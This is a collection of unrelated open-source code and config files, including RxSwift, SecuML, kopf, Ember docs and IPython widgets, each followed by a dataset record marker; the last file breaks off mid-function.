// Created by Krunoslav Zaher on 9/11/16.
// Copyright © 2016 Krunoslav Zaher. All rights reserved.
//
extension ObservableType {
/**
Ignores elements from an observable sequence which are followed by another element within a specified relative time duration, using the specified scheduler to run throttling timers.
- seealso: [debounce operator on reactivex.io](http://reactivex.io/documentation/operators/debounce.html)
- parameter dueTime: Throttling duration for each element.
- parameter scheduler: Scheduler to run the throttle timers on.
- returns: The throttled sequence.
*/
public func debounce(_ dueTime: RxTimeInterval, scheduler: SchedulerType)
-> Observable<E> {
return Debounce(source: self.asObservable(), dueTime: dueTime, scheduler: scheduler)
}
}
final fileprivate class DebounceSink<O: ObserverType>
: Sink<O>
, ObserverType
, LockOwnerType
, SynchronizedOnType {
typealias Element = O.E
typealias ParentType = Debounce<Element>
private let _parent: ParentType
let _lock = RecursiveLock()
// state
private var _id = 0 as UInt64
private var _value: Element? = nil
let cancellable = SerialDisposable()
init(parent: ParentType, observer: O, cancel: Cancelable) {
_parent = parent
super.init(observer: observer, cancel: cancel)
}
func run() -> Disposable {
let subscription = _parent._source.subscribe(self)
return Disposables.create(subscription, cancellable)
}
func on(_ event: Event<Element>) {
synchronizedOn(event)
}
func _synchronized_on(_ event: Event<Element>) {
switch event {
case .next(let element):
_id = _id &+ 1
let currentId = _id
_value = element
let scheduler = _parent._scheduler
let dueTime = _parent._dueTime
let d = SingleAssignmentDisposable()
self.cancellable.disposable = d
d.setDisposable(scheduler.scheduleRelative(currentId, dueTime: dueTime, action: self.propagate))
case .error:
_value = nil
forwardOn(event)
dispose()
case .completed:
if let value = _value {
_value = nil
forwardOn(.next(value))
}
forwardOn(.completed)
dispose()
}
}
func propagate(_ currentId: UInt64) -> Disposable {
_lock.lock(); defer { _lock.unlock() } // {
let originalValue = _value
if let value = originalValue, _id == currentId {
_value = nil
forwardOn(.next(value))
}
// }
return Disposables.create()
}
}
final fileprivate class Debounce<Element> : Producer<Element> {
fileprivate let _source: Observable<Element>
fileprivate let _dueTime: RxTimeInterval
fileprivate let _scheduler: SchedulerType
init(source: Observable<Element>, dueTime: RxTimeInterval, scheduler: SchedulerType) {
_source = source
_dueTime = dueTime
_scheduler = scheduler
}
override func run<O: ObserverType>(_ observer: O, cancel: Cancelable) -> (sink: Disposable, subscription: Disposable) where O.E == Element {
let sink = DebounceSink(parent: self, observer: observer, cancel: cancel)
let subscription = sink.run()
return (sink: sink, subscription: subscription)
}
}
| {
"pile_set_name": "Github"
} |
<component name="libraryTable">
<library name="Maven: org.antlr:stringtemplate:3.2.1">
<CLASSES>
<root url="jar://$MAVEN_REPOSITORY$/org/antlr/stringtemplate/3.2.1/stringtemplate-3.2.1.jar!/" />
</CLASSES>
<JAVADOC>
<root url="jar://$MAVEN_REPOSITORY$/org/antlr/stringtemplate/3.2.1/stringtemplate-3.2.1-javadoc.jar!/" />
</JAVADOC>
<SOURCES>
<root url="jar://$MAVEN_REPOSITORY$/org/antlr/stringtemplate/3.2.1/stringtemplate-3.2.1-sources.jar!/" />
</SOURCES>
</library>
</component> | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<resources>
<color name="body">#ffffeb</color>
<color name="sky">#e2f6ff</color>
<color name="blue">#1997d4</color>
<color name="white">#f9f9f9</color>
<color name="black">#000000</color>
</resources> | {
"pile_set_name": "Github"
} |
#!/bin/bash
# Copyright (c) 2020 The Orbit Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This script first runs the ggp ssh init command to get the needed
# credentials to connect via ssh. Then it connects to the instance
# with portforwarding and starts OrbitService. To also deploy OrbitService,
# invoke with the argument --deploy and a path to the OrbitService executable
# e.g. run_service_ssh.sh --deploy build/bin/OrbitService
# All other arguments will be passed to OrbitService.
if [ -z "$GGP_SDK_PATH" ]; then
echo "Ggp sdk not found"
exit 1
fi
GGP_EXEC="$GGP_SDK_PATH/dev/bin/ggp"
OTHER_ARGS="$@"
if [ ! -z "$1" ] && [ "$1" == "--deploy" -o "$1" == "-deploy" ]; then
$GGP_EXEC ssh put "$2"
$GGP_EXEC ssh shell -- chmod u+x /mnt/developer/OrbitService
OTHER_ARGS="${@:3}"
fi
OUTPUT=$(eval $GGP_EXEC ssh init | tee /dev/tty)
while IFS= read -r line; do
if [[ $line == *"User:"* ]]; then
GGP_USER=$(echo ${line/User:/} | sed -e 's/^[[:space:]]*//')
fi
if [[ $line == *"Host:"* ]]; then
GGP_HOST=$(echo ${line/Host:/} | sed -e 's/^[[:space:]]*//')
fi
if [[ $line == *"Port:"* ]]; then
GGP_PORT=$(echo ${line/Port:/} | sed -e 's/^[[:space:]]*//')
fi
if [[ $line == *"Key Path:"* ]]; then
GGP_KEY_PATH=$(echo ${line/Key Path:/} | sed -e 's/^[[:space:]]*//')
fi
if [[ $line == *"Known Hosts Path:"* ]]; then
GGP_KNOWN_HOSTS_PATH=$(echo ${line/Known Hosts Path:/} | sed -e 's/^[[:space:]]*//')
fi
done <<< "$OUTPUT"
if [ -z "$GGP_USER" ] || [ -z "$GGP_HOST" ] || [ -z "$GGP_PORT" ] || [ -z "$GGP_KEY_PATH" ] || [ -z "$GGP_KNOWN_HOSTS_PATH" ]; then
echo "Unable to get all necessary information from ggp ssh init"
exit 1
fi
ssh -t -p"$GGP_PORT" -F/dev/null -i"$GGP_KEY_PATH" -oStrictHostKeyChecking=yes -oUserKnownHostsFile="$GGP_KNOWN_HOSTS_PATH" \
-L44766:localhost:44766 -L44765:localhost:44765 "$GGP_USER"@"$GGP_HOST" -- sudo /mnt/developer/OrbitService "$OTHER_ARGS"
| {
"pile_set_name": "Github"
} |
var path = window.location.pathname.split('/');
var exp_id = path[2];
var iteration = path[3];
var exp_type = 'ActiveLearning';
var label_method = 'annotation';
var current_label = null;
var families_list = null;
var num_families = null;
var current_family_index = null;
var instances_list = null;
var confidence_list = null;
var num_instances = null;
var current_instance_index = null;
var annotation_queries = null;
var conf = null;
function getCurrentInstance() {
return instances_list[current_instance_index];
}
function callback() {
conf.interactive = false;
if (!conf.core_conf.auto) {
var current_iteration = currentAnnotationIteration(
exp_id);
conf.interactive = iteration == current_iteration;
}
d3.json(buildQuery('getRcdClusteringId', [exp_id, iteration]),
function(data) {
var clustering_exp_id = data['clustering_exp_id'];
var main = $('#main')[0];
var nav_bars = createDivWithClass('nav_bars', 'col-md-12',
parent_div=main);
displayAnnotationDivision();
var annotations_type = 'individual';
if (clustering_exp_id != -1) {
annotations_type = 'families';
}
displayInstancesToAnnotate(annotations_type, clustering_exp_id);
addShortcuts();
}
);
}
loadConfigurationFile(exp_id, callback);
function displayInstancesToAnnotate(annotations_type, clustering_exp) {
displayNavbars('primary', annotations_type, clustering_exp);
if (annotations_type == 'families') {
var query = buildQuery('getFamiliesInstancesToAnnotate',
[exp_id, iteration, 'all']);
d3.json(query, function(data) {
annotation_queries = data;
families_list = Object.keys(data);
// The families with no annotation query are not displayed.
families_list = families_list.filter(
function nonEmpty(x) {
return annotation_queries[x]['instance_ids'].length > 0
});
num_families = families_list.length;
current_family_index = 0;
updateFamilyNavbar();
});
} else if (annotations_type == 'individual') {
var query = buildQuery('getInstancesToAnnotate',
[exp_id, iteration, label]);
d3.json(query, function(data) {
instances_list = data['instances'];
families_list = null;
num_families = null;
current_family_index = null;
confidence_list = null;
num_instances = instances_list.length;
current_instance_index = 0;
updateInstanceNavbar();
});
}
}
function displayFamilyInstancesToAnnotate(family) {
instances_list = annotation_queries[family]['instance_ids'];
confidence_list = annotation_queries[family]['confidence'];
num_instances = instances_list.length;
current_instance_index = 0;
updateInstanceNavbar();
}
function displayNextInstance() {
if (current_instance_index <= num_instances-2) {
current_instance_index += 1;
updateInstanceNavbar();
} else {
displayNextFamily();
}
}
function displayPrevInstance() {
if (current_instance_index > 0) {
current_instance_index -= 1;
updateInstanceNavbar();
}
}
function displayNextFamily() {
if (current_family_index <= num_families-2) {
current_family_index += 1;
updateFamilyNavbar();
}
}
function displayPrevFamily() {
if (current_family_index > 0) {
current_family_index -= 1;
updateFamilyNavbar();
}
}
function updateFamilyNavbar() {
var iter_family = cleanDiv('iter_family');
iter_family.appendChild(document.createTextNode(
(current_family_index+1) + ' / ' + num_families));
var current_family = cleanDiv('current_family');
var current_family_label = document.createElement('label');
current_family_label.setAttribute('class', 'label label-primary');
current_family_label.appendChild(
document.createTextNode(families_list[current_family_index]));
current_family.appendChild(current_family_label);
displayFamilyInstancesToAnnotate(families_list[current_family_index]);
}
function updateInstanceNavbar() {
var iter_label = cleanDiv('iter_label');
iter_label.appendChild(document.createTextNode(
(current_instance_index+1) + ' / ' + num_instances));
var suggested_family = null;
var suggested_label = null;
if (confidence_list) {
if (confidence_list[current_instance_index] == 'high') {
suggested_family = families_list[current_family_index];
suggested_label = annotation_queries[suggested_family]['label'];
}
}
printInstanceInformation(instances_list[current_instance_index],
proba=null,
suggested_label,
suggested_family);
}
function displayNavbars(type, annotations_type, clustering_exp) {
var nav_bars = cleanDiv('nav_bars');
var panel_body = createPanel('panel-' + type, 'col-md-10',
'Annotation Queries', nav_bars);
var col = createDivWithClass(null, 'col-md-10', panel_body);
if (annotations_type == 'families') {
displayFamiliesBar(col, type, clustering_exp);
}
displayAnnotationQueriesBar(col, type);
var col = createDivWithClass(null, 'col-md-2', panel_body);
clusteringVisualization(col, clustering_exp);
displayEndButton(col);
}
function clusteringVisualization(row, clustering_exp) {
function displayClustering(clustering_exp) {
return function() {
var query = buildQuery('SecuML', [clustering_exp]);
window.open(query);
}
}
var group = createDivWithClass('', 'row', row);
var button = document.createElement('button');
button.setAttribute('class', 'btn btn-default');
button.setAttribute('type', 'button');
button.setAttribute('id', 'button_clustering');
var button_text = document.createTextNode('Display Families');
button.appendChild(button_text);
button.addEventListener('click', displayClustering(clustering_exp));
group.appendChild(button);
}
function displayFamiliesBar(panel_body, type, clustering_exp) {
var col_size = 'col-md-2';
var row = createDivWithClass(null, 'row', parent_div = panel_body);
var annotation_query_family = document.createElement('label');
annotation_query_family.setAttribute('class', col_size + ' control-label');
var family_label = document.createElement('label');
family_label.appendChild(document.createTextNode('Family'))
annotation_query_family.appendChild(family_label);
//annotation_query_family.appendChild(document.createTextNode('Family'));
row.appendChild(annotation_query_family);
var current_family_header = document.createElement('h4');
row.appendChild(current_family_header);
var current_family = document.createElement('label');
current_family.setAttribute('class', col_size + ' control-label');
current_family.setAttribute('id', 'current_family');
current_family_header.appendChild(current_family);
var iter_family = document.createElement('label');
iter_family.setAttribute('class', col_size + ' control-label');
iter_family.setAttribute('id', 'iter_family');
row.appendChild(iter_family);
// Prev / Next buttons
var prev_next_group = createDivWithClass('', 'form-group ' + col_size, row);
// Prev button
var prev_button = document.createElement('button');
prev_button.setAttribute('class', 'btn btn-' + type);
prev_button.setAttribute('type', 'button');
prev_button.setAttribute('id', 'prev_button_family');
var prev_button_text = document.createTextNode('Prev');
prev_button.appendChild(prev_button_text);
prev_button.addEventListener('click', displayPrevFamily);
prev_next_group.appendChild(prev_button);
// Next button
var next_button = document.createElement('button');
next_button.setAttribute('class', 'btn btn-' + type);
next_button.setAttribute('type', 'button');
next_button.setAttribute('id', 'next_button_family');
var next_button_text = document.createTextNode('Next');
next_button.appendChild(next_button_text);
next_button.addEventListener('click', displayNextFamily);
prev_next_group.appendChild(next_button);
}
function displayEndButton(row) {
if (conf.interactive) {
var end_group = document.createElement('h3');
end_group.setAttribute('class', 'row');
row.appendChild(end_group);
var end_button = document.createElement('button');
end_button.setAttribute('class', 'btn btn-primary');
end_button.setAttribute('type', 'button');
end_button.setAttribute('id', 'end_button');
var end_button_text = document.createTextNode('Next Iteration');
end_button.appendChild(end_button_text);
end_button.addEventListener('click', runNextIteration(conf));
end_group.appendChild(end_button);
}
}
function displayAnnotationQueriesBar(panel_body, type) {
var row = createDivWithClass(null, 'row', parent_div = panel_body);
var annotation_query_label = document.createElement('label');
annotation_query_label.setAttribute('class', 'col-md-4 control-label');
annotation_query_label.appendChild(document.createTextNode(
'Annotation Query'));
row.appendChild(annotation_query_label);
var iter_label = document.createElement('label');
iter_label.setAttribute('class', 'col-md-2 control-label');
iter_label.setAttribute('id', 'iter_label');
row.appendChild(iter_label);
// Prev / Next buttons
var prev_next_group = createDivWithClass('', 'form-group col-md-2', row);
// Prev button
var prev_button = document.createElement('button');
prev_button.setAttribute('class', 'btn btn-' + type);
prev_button.setAttribute('type', 'button');
prev_button.setAttribute('id', 'prev_button');
var prev_button_text = document.createTextNode('Prev');
prev_button.appendChild(prev_button_text);
prev_button.addEventListener('click', displayPrevInstance);
prev_next_group.appendChild(prev_button);
// Next button
var next_button = document.createElement('button');
next_button.setAttribute('class', 'btn btn-' + type);
next_button.setAttribute('type', 'button');
next_button.setAttribute('id', 'next_button');
var next_button_text = document.createTextNode('Next');
next_button.appendChild(next_button_text);
next_button.addEventListener('click', displayNextInstance);
prev_next_group.appendChild(next_button);
}
function displayAnnotationDivision() {
var main = $('#main')[0];
// Selected instance - data and annotation
var row = createDivWithClass(null, 'row', parent_div = main);
displayInstancePanel(row);
displayInstanceInformationStructure();
displayAnnotationDiv(suggestion = true);
}
function displayNextInstanceToAnnotate() {
displayNextInstance();
}
| {
"pile_set_name": "Github"
} |
/*
* /MathJax/jax/output/HTML-CSS/fonts/TeX/Typewriter/Regular/CombDiacritMarks.js
*
* Copyright (c) 2009-2014 The MathJax Consortium
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
MathJax.Hub.Insert(MathJax.OutputJax["HTML-CSS"].FONTDATA.FONTS.MathJax_Typewriter,{768:[611,-485,0,-409,-195],769:[611,-485,0,-331,-117],770:[611,-460,0,-429,-97],771:[611,-466,0,-438,-88],772:[577,-500,0,-452,-74],774:[611,-504,0,-446,-79],776:[612,-519,0,-421,-104],778:[619,-499,0,-344,-182],780:[577,-449,0,-427,-99]});MathJax.Ajax.loadComplete(MathJax.OutputJax["HTML-CSS"].fontDir+"/Typewriter/Regular/CombDiacritMarks.js");
| {
"pile_set_name": "Github"
} |
rm profile.png
gprof2dot -f pstats profile.out | dot -Tpng -o profile.png | {
"pile_set_name": "Github"
} |
package org.rrd4j.graph;
import java.awt.Paint;
class VSpan extends Span {
final long start;
final long end;
VSpan(long start, long end, Paint color, LegendText legend) {
super(color, legend);
this.start = start;
this.end = end;
assert(start < end);
}
private boolean checkRange(long v, long min, long max) {
return v >= min && v <= max;
}
void setLegendVisibility(long min, long max, boolean forceLegend) {
legend.enabled = legend.enabled && (forceLegend
|| checkRange(start, min, max)
|| checkRange(end, min, max));
}
}
| {
"pile_set_name": "Github"
} |
package cn.springcloud.service.a.rest;
import com.google.common.collect.ImmutableMap;
import org.apache.commons.lang.StringUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.core.env.Environment;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import java.util.Map;
/**
* Created by saleson on 2017/10/18.
*/
//@RestController
//@RequestMapping("/api/test")
public class TestResource {
@Value("${test.sleepTime:50}")
private long sleepTime = 50;
@Autowired
Environment env;
@RequestMapping(value = "/get", method = RequestMethod.GET)
@ResponseBody
public Map<String, String> testGet(@RequestParam(value = "version", required = false) String version) {
long start = System.currentTimeMillis();
// try {
// Thread.sleep(sleepTime);
// } catch (InterruptedException e) {
// }
return ImmutableMap.of("test", "success.",
"version", StringUtils.defaultIfEmpty(version, ""),
"serverPort", env.getProperty("server.port"),
"usedTime", String.valueOf(System.currentTimeMillis() - start));
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!-- TODO: This screen should be adapted to match its special function, i.e. add images etc. -->
<Include
xmlns="www.team-mediaportal.com/2008/mpf/directx"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
Source="screens\SimpleShowItems.xaml"
>
<Include.Resources>
<ResourceWrapper x:Key="Header_Text" Resource="[Media.ChooseVideoHeader]"/>
<ResourceWrapper x:Key="Cover_Width" Resource="810"/>
</Include.Resources>
</Include>
| {
"pile_set_name": "Github"
} |
"""
Rudimentary piggybacking on the known K8s API clients for authentication.
Kopf is not a client library, and avoids bringing too much logic
for proper authentication, especially all the complex auth-providers.
Instead, it uses the existing clients, triggers the (re-)authentication
in them, and extracts the basic credentials for its own use.
.. seealso::
:mod:`credentials` and :func:`authentication`.
"""
import logging
import warnings
from typing import Any, Union, Optional, Sequence
from kopf.clients import auth
from kopf.structs import credentials
# Keep as constants to make them patchable. Higher priority is more preferred.
PRIORITY_OF_CLIENT: int = 10
PRIORITY_OF_PYKUBE: int = 20
# We keep the official client library auto-login only because it was
# an implied behavior before switching to pykube -- to keep it so (implied).
def login_via_client(
*args: Any,
logger: Union[logging.Logger, logging.LoggerAdapter],
**kwargs: Any,
) -> Optional[credentials.ConnectionInfo]:
try:
import kubernetes.config
except ImportError:
return None
try:
kubernetes.config.load_incluster_config() # cluster env vars
logger.debug("Client is configured in cluster with service account.")
except kubernetes.config.ConfigException as e1:
try:
kubernetes.config.load_kube_config() # developer's config files
logger.debug("Client is configured via kubeconfig file.")
except kubernetes.config.ConfigException as e2:
raise credentials.LoginError(f"Cannot authenticate client neither in-cluster, nor via kubeconfig.")
# We do not even try to understand how it works and why. Just load it, and extract the results.
config = kubernetes.client.Configuration()
# For auth-providers, this method is monkey-patched with the auth-provider's one.
# We need the actual auth-provider's token, so we call it instead of accessing api_key.
# Other keys (token, tokenFile) also end up being retrieved via this method.
header: Optional[str] = config.get_api_key_with_prefix('authorization')
parts: Sequence[str] = header.split(' ', 1) if header else []
scheme, token = ((None, None) if len(parts) == 0 else
(None, parts[0]) if len(parts) == 1 else
(parts[0], parts[1])) # RFC-7235, Appendix C.
# Interpret the config object for our own minimalistic credentials.
# Note: kubernetes client has no concept of a "current" context's namespace.
return credentials.ConnectionInfo(
server=config.host,
ca_path=config.ssl_ca_cert, # can be a temporary file
insecure=not config.verify_ssl,
username=config.username or None, # an empty string when not defined
password=config.password or None, # an empty string when not defined
scheme=scheme,
token=token,
certificate_path=config.cert_file, # can be a temporary file
private_key_path=config.key_file, # can be a temporary file
priority=PRIORITY_OF_CLIENT,
)
# Pykube login is mandatory. If it fails, the framework will not run at all.
def login_via_pykube(
*args: Any,
logger: Union[logging.Logger, logging.LoggerAdapter],
**kwargs: Any,
) -> Optional[credentials.ConnectionInfo]:
try:
import pykube
except ImportError:
return None
# Read the pykube config either way for later interpretation.
# DEPRECATED: Previously, in some cases, get_pykube_cfg() was monkey-patched
# to inject custom authentication methods. Support these hacks if possible.
config: pykube.KubeConfig
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
config = auth.get_pykube_cfg()
logger.debug("Pykube is configured via monkey-patched get_pykube_cfg().")
except NotImplementedError:
try:
config = pykube.KubeConfig.from_service_account()
logger.debug("Pykube is configured in cluster with service account.")
except FileNotFoundError:
try:
config = pykube.KubeConfig.from_file()
logger.debug("Pykube is configured via kubeconfig file.")
except (pykube.PyKubeError, FileNotFoundError):
raise credentials.LoginError(f"Cannot authenticate pykube "
f"neither in-cluster, nor via kubeconfig.")
# We don't know how this token will be retrieved, we just get it afterwards.
provider_token = None
if config.user.get('auth-provider'):
api = pykube.HTTPClient(config)
api.get(version='', base='/') # ignore the response status
provider_token = config.user.get('auth-provider', {}).get('config', {}).get('access-token')
# Interpret the config object for our own minimalistic credentials.
ca: Optional[pykube.config.BytesOrFile] = config.cluster.get('certificate-authority')
cert: Optional[pykube.config.BytesOrFile] = config.user.get('client-certificate')
pkey: Optional[pykube.config.BytesOrFile] = config.user.get('client-key')
return credentials.ConnectionInfo(
server=config.cluster.get('server'),
ca_path=ca.filename() if ca else None, # can be a temporary file
insecure=config.cluster.get('insecure-skip-tls-verify'),
username=config.user.get('username'),
password=config.user.get('password'),
token=config.user.get('token') or provider_token,
certificate_path=cert.filename() if cert else None, # can be a temporary file
private_key_path=pkey.filename() if pkey else None, # can be a temporary file
default_namespace=config.namespace,
priority=PRIORITY_OF_PYKUBE,
)
| {
"pile_set_name": "Github"
} |
To define a component, run:
```bash
ember generate component my-component-name
```
Components must have at least one dash in their name. So `blog-post` is an acceptable
name, and so is `audio-player-controls`, but `post` is not. This prevents clashes with
current or future HTML element names, aligns Ember components with the W3C [Custom
Elements](https://dvcs.w3.org/hg/webcomponents/raw-file/tip/spec/custom/index.html)
spec, and ensures Ember detects the components automatically.
A sample component template could look like this:
```handlebars {data-filename=app/templates/components/blog-post.hbs}
<article class="blog-post">
<h1>{{title}}</h1>
<p>{{yield}}</p>
<p>Edit title: {{input type="text" value=title}}</p>
</article>
```
Given the above template, you can now use the `{{blog-post}}` component:
```handlebars {data-filename=app/templates/index.hbs}
{{#each model as |post|}}
{{#blog-post title=post.title}}
{{post.body}}
{{/blog-post}}
{{/each}}
```
Its model is populated in the `model` hook of the route handler:
```javascript {data-filename=app/routes/index.js}
import Ember from 'ember';
export default Ember.Route.extend({
model() {
return this.get('store').findAll('post');
}
});
```
Each component, under the hood, is backed by an element. By default
Ember will use a `<div>` element to contain your component's template.
To learn how to change the element Ember uses for your component, see
[Customizing a Component's
Element](./customizing-a-components-element).
## Defining a Component Subclass
Oftentimes, your components will just encapsulate certain snippets of
Handlebars templates that you find yourself using over and over. In
those cases, you do not need to write any JavaScript at all. Define
the Handlebars template as described above and use the component that is
created.
If you need to customize the behavior of the component you'll
need to define a subclass of [`Ember.Component`][1]. For example, you would
need a custom subclass if you wanted to change a component's element,
respond to actions from the component's template, or manually make
changes to the component's element using JavaScript.
[1]: https://api.emberjs.com/classes/Ember.Component.html
Ember knows which subclass powers a component based on its filename. For
example, if you have a component called `blog-post`, you would create a
file at `app/components/blog-post.js`. If your component was called
`audio-player-controls`, the file name would be at
`app/components/audio-player-controls.js`.
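
A minimal subclass, sketched here with a purely illustrative action handler, would look something like this:

```javascript {data-filename=app/components/blog-post.js}
import Ember from 'ember';

export default Ember.Component.extend({
  // Illustrative only: toggle a flag when the template sends the 'expand' action.
  actions: {
    expand() {
      this.toggleProperty('isExpanded');
    }
  }
});
```

A template could then trigger it with the `{{action "expand"}}` helper on an element.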
## Dynamically rendering a component
The [`{{component}}`][2] helper can be used to defer the selection of a component to
run time. The `{{my-component}}` syntax always renders the same component,
while using the `{{component}}` helper allows choosing a component to render on
the fly. This is useful in cases where you want to interact with different
external libraries depending on the data. Using the `{{component}}` helper would
allow you to keep different logic well separated.
The first parameter of the helper is the name of a component to render, as a
string. So `{{component 'blog-post'}}` is the same as using `{{blog-post}}`.
The real value of [`{{component}}`][2] comes from being able to dynamically pick
the component being rendered. Below is an example of using the helper as a
means of choosing different components for displaying different kinds of posts:
[2]: https://api.emberjs.com/classes/Ember.Templates.helpers.html#method_component
```handlebars {data-filename=app/templates/components/foo-component.hbs}
<h3>Hello from foo!</h3>
<p>{{post.body}}</p>
```
```handlebars {data-filename=app/templates/components/bar-component.hbs}
<h3>Hello from bar!</h3>
<div>{{post.author}}</div>
```
```javascript {data-filename=app/routes/index.js}
import Ember from 'ember';
export default Ember.Route.extend({
model() {
return this.get('store').findAll('post');
}
});
```
```handlebars {data-filename=app/templates/index.hbs}
{{#each model as |post|}}
{{!-- either foo-component or bar-component --}}
{{component post.componentName post=post}}
{{/each}}
```
When the parameter passed to `{{component}}` evaluates to `null` or `undefined`,
the helper renders nothing. When the parameter changes, the currently rendered
component is destroyed and the new component is created and brought in.
Picking different components to render in response to the data allows you to
have different template and behavior for each case. The `{{component}}` helper
is a powerful tool for improving code modularity.
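
For completeness, here is one way the `componentName` attribute used above might be supplied, assuming the posts are Ember Data models; the attribute and its values are illustrative rather than part of the original example:

```javascript {data-filename=app/models/post.js}
import DS from 'ember-data';

export default DS.Model.extend({
  title: DS.attr('string'),
  author: DS.attr('string'),
  body: DS.attr('string'),
  // e.g. 'foo-component' or 'bar-component'; a null value renders nothing.
  componentName: DS.attr('string')
});
```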
| {
"pile_set_name": "Github"
} |
version https://git-lfs.github.com/spec/v1
oid sha256:1effcb8ef65b662b2c370863507a04b103a51f9109fe9b0137b1b362cfdcede7
size 3272
| {
"pile_set_name": "Github"
} |
//----------------------------------------------------------------------------
// Copyright (C) 2013 The IPython Development Team
//
// Distributed under the terms of the BSD License. The full license is in
// the file COPYING, distributed as part of this software.
//----------------------------------------------------------------------------
//============================================================================
// ContainerWidget
//============================================================================
/**
* @module IPython
* @namespace IPython
**/
define(["widgets/js/widget"], function(WidgetManager) {
var ContainerView = IPython.DOMWidgetView.extend({
render: function(){
// Called when view is rendered.
this.$el.addClass('widget-container')
.addClass('vbox');
this.children={};
this.update_children([], this.model.get('_children'));
this.model.on('change:_children', function(model, value, options) {
this.update_children(model.previous('_children'), value);
}, this);
this.update();
},
update_children: function(old_list, new_list) {
// Called when the children list changes.
this.do_diff(old_list,
new_list,
$.proxy(this.remove_child_model, this),
$.proxy(this.add_child_model, this));
},
remove_child_model: function(model) {
// Called when a model is removed from the children list.
this.child_views[model.id].remove();
this.delete_child_view(model);
},
add_child_model: function(model) {
// Called when a model is added to the children list.
var view = this.create_child_view(model);
this.$el.append(view.$el);
},
update: function(){
// Update the contents of this view
//
// Called when the model is changed. The model may have been
// changed by another view or by a state update from the back-end.
return ContainerView.__super__.update.apply(this);
},
});
WidgetManager.register_widget_view('ContainerView', ContainerView);
var PopupView = IPython.DOMWidgetView.extend({
render: function(){
// Called when view is rendered.
var that = this;
this.children={};
this.$el.on("remove", function(){
that.$window.remove();
});
this.$window = $('<div />')
.addClass('modal widget-modal')
.appendTo($('#notebook-container'))
.mousedown(function(){
that.bring_to_front();
});
            // Set the elements array since this.$window is not a child
            // of this.$el, and the parent widget manager or other widgets may
            // need to know about all of the top-level widgets. The IPython
            // widget manager uses this to register the elements with the
            // keyboard manager.
            this.additional_elements = [this.$window];
this.$title_bar = $('<div />')
.addClass('popover-title')
.appendTo(this.$window)
.mousedown(function(){
that.bring_to_front();
});
this.$close = $('<button />')
.addClass('close icon-remove')
.css('margin-left', '5px')
.appendTo(this.$title_bar)
.click(function(){
that.hide();
event.stopPropagation();
});
this.$minimize = $('<button />')
.addClass('close icon-arrow-down')
.appendTo(this.$title_bar)
.click(function(){
that.popped_out = !that.popped_out;
if (!that.popped_out) {
that.$minimize
.removeClass('icon-arrow-down')
.addClass('icon-arrow-up');
that.$window
.draggable('destroy')
.resizable('destroy')
.removeClass('widget-modal modal')
.addClass('docked-widget-modal')
.detach()
.insertBefore(that.$show_button);
that.$show_button.hide();
that.$close.hide();
} else {
that.$minimize
.addClass('icon-arrow-down')
.removeClass('icon-arrow-up');
that.$window
.removeClass('docked-widget-modal')
.addClass('widget-modal modal')
.detach()
.appendTo($('#notebook-container'))
.draggable({handle: '.popover-title', snap: '#notebook, .modal', snapMode: 'both'})
.resizable()
.children('.ui-resizable-handle').show();
that.show();
that.$show_button.show();
that.$close.show();
}
event.stopPropagation();
});
this.$title = $('<div />')
.addClass('widget-modal-title')
.html(" ")
.appendTo(this.$title_bar);
this.$body = $('<div />')
.addClass('modal-body')
.addClass('widget-modal-body')
.addClass('widget-container')
.addClass('vbox')
.appendTo(this.$window);
this.$show_button = $('<button />')
.html(" ")
.addClass('btn btn-info widget-modal-show')
.appendTo(this.$el)
.click(function(){
that.show();
});
this.$window.draggable({handle: '.popover-title', snap: '#notebook, .modal', snapMode: 'both'});
this.$window.resizable();
this.$window.on('resize', function(){
that.$body.outerHeight(that.$window.innerHeight() - that.$title_bar.outerHeight());
});
this.$el_to_style = this.$body;
this._shown_once = false;
this.popped_out = true;
this.update_children([], this.model.get('_children'));
this.model.on('change:_children', function(model, value, options) {
this.update_children(model.previous('_children'), value);
}, this);
this.update();
},
hide: function() {
// Called when the modal hide button is clicked.
this.$window.hide();
this.$show_button.removeClass('btn-info');
},
show: function() {
// Called when the modal show button is clicked.
this.$show_button.addClass('btn-info');
this.$window.show();
if (this.popped_out) {
this.$window.css("positon", "absolute");
this.$window.css("top", "0px");
this.$window.css("left", Math.max(0, (($('body').outerWidth() - this.$window.outerWidth()) / 2) +
$(window).scrollLeft()) + "px");
this.bring_to_front();
}
},
bring_to_front: function() {
// Make the modal top-most, z-ordered about the other modals.
var $widget_modals = $(".widget-modal");
var max_zindex = 0;
$widget_modals.each(function (index, el){
max_zindex = Math.max(max_zindex, parseInt($(el).css('z-index')));
});
// Start z-index of widget modals at 2000
max_zindex = Math.max(max_zindex, 2000);
$widget_modals.each(function (index, el){
$el = $(el);
if (max_zindex == parseInt($el.css('z-index'))) {
$el.css('z-index', max_zindex - 1);
}
});
this.$window.css('z-index', max_zindex);
},
update_children: function(old_list, new_list) {
// Called when the children list is modified.
this.do_diff(old_list,
new_list,
$.proxy(this.remove_child_model, this),
$.proxy(this.add_child_model, this));
},
remove_child_model: function(model) {
// Called when a child is removed from children list.
this.child_views[model.id].remove();
this.delete_child_view(model);
},
add_child_model: function(model) {
// Called when a child is added to children list.
var view = this.create_child_view(model);
this.$body.append(view.$el);
},
update: function(){
// Update the contents of this view
//
// Called when the model is changed. The model may have been
// changed by another view or by a state update from the back-end.
var description = this.model.get('description');
if (description.trim().length === 0) {
this.$title.html(" "); // Preserve title height
} else {
this.$title.text(description);
}
var button_text = this.model.get('button_text');
if (button_text.trim().length === 0) {
this.$show_button.html(" "); // Preserve button height
} else {
this.$show_button.text(button_text);
}
if (!this._shown_once) {
